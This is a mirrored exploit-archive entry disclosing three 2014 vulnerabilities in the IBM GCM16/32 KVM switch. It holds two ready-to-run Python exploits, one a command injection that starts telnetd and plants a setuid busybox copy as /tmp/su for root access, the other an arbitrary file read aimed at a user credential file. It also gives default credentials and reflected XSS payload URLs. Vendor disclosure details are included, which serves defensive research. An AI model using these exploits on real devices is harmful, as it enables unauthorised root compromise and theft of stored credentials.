Skip to content
cyberexploits
remotephptext

IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities

IBM GCM16/32 1.20.0.22575 - Multiple Vulnerabilities

Publié le 2014-07-21

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/remote/34132.txt7eac4c3a
raw
 *Product description*

 The IBM 1754 GCM family provides KVM over IP and serial console management

technology in a single appliance. Versions v1.20.0.22575 and prior are

vulnerables.

 Note that this vulnerability is also present in some DELL and probably

other vendors of this rebranded KVM. I contacted Dell but no response has

been received.



 *1. Remote code execution *

 CVEID: CVE-2014-2085

 Description: Improperly sanitized input may allow a remote authenticated

attacker to perform remote code execution on the GCM KVM switch.

 PoC of this vulnerability:



#!/usr/bin/python"""

Exploit for Avocent KVM switch v1.20.0.22575.

Remote code execution with privilege elevation.

SessionId (avctSessionId) is neccesary for this to work, so you need a

valid user. Default user is "Admin" with blank password.

After running exploit, connect using telnet to device with user target

(pass: target) then do "/tmp/su -" to gain root (password "root")

alex.a.bravo@gmail.com

"""



from StringIO import StringIO

import pycurl

import os



sessid = "1111111111"

target = "192.168.0.10"



durl = "https://" + target + "/systest.php?lpres=;%20/usr/

sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod%

206755%20/tmp/su%20;"



storage = StringIO()

c = pycurl.Curl()

c.setopt(c.URL, durl)

c.setopt(c.SSL_VERIFYPEER,0)

c.setopt(c.SSL_VERIFYHOST,0)

c.setopt(c.WRITEFUNCTION,storage.write)

c.setopt(c.COOKIE,'avctSessionId=' + sessid)



try:

        print "[*] Sending GET to " + target + " with session id " + sessid

+ "..."

        c.perform()

        c.close()

except:

        print ""

finally:

        print "[*] Done"

print "[*] Trying telnet..."

print "[*] Login as target/target, then do /tmp/su - and enter password

\"root\""

os.system("telnet " + target)



*2. Arbitrary file read *

 CVEID: CVE-2014-3081

 Description: This device allows any authenticated user to read arbitrary

files. Files can be anywhere on the target.



 PoC of this vulnerability:



#!/usr/bin/python

"""

This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to

read arbitrary files on device.

SessionId (avctSessionId) is neccesary for this to work, so you need a

valid user.

alex.a.bravo@gmail.com

"""



from StringIO import StringIO

import pycurl



sessid = "1111111111"

target = "192.168.0.10"

file = "/etc/IBM_user.dat"



durl = "https://" + target + "/prodtest.php?engage=video_

bits&display=results&filename=" + file



storage = StringIO()

c = pycurl.Curl()

c.setopt(c.URL, durl)

c.setopt(c.SSL_VERIFYPEER,0)

c.setopt(c.SSL_VERIFYHOST,0)

c.setopt(c.WRITEFUNCTION,storage.write)

c.setopt(c.COOKIE,'avctSessionId=' + sessid)



try:

        c.perform()

        c.close()

except:

        print ""



content = storage.getvalue()

print content.replace("<td>","").replace("</td>","")



*3. Cross site scripting non-persistent*

 CVEID: CVE-2014-3080

 Description: System is vulnerable to cross-site scripting, caused by

improper validation of user-supplied input. A remote attacker could exploit

this vulnerability using a specially-crafted URL to execute script in a

victim's Web browser within the security context of the hosting Web site,

once the URL is clicked. An attacker could use this vulnerability to steal

the victim's cookie-based authentication credentials.



 Examples:

http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E

https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E



*Vendor Response:*

IBM release 1.20.20.23447 firmware



*Timeline:*

2014-05-20 - Vendor (PSIRT) notified

2014-05-21 - Vendor assigns internal ID

2014-07-16 - Patch Disclosed

2014-07-17 - Vulnerability disclosed



*External Information:*

Info about the vulnerability (spanish):

http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html

IBM Security Bulletin:

http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983



Voir sur GitHub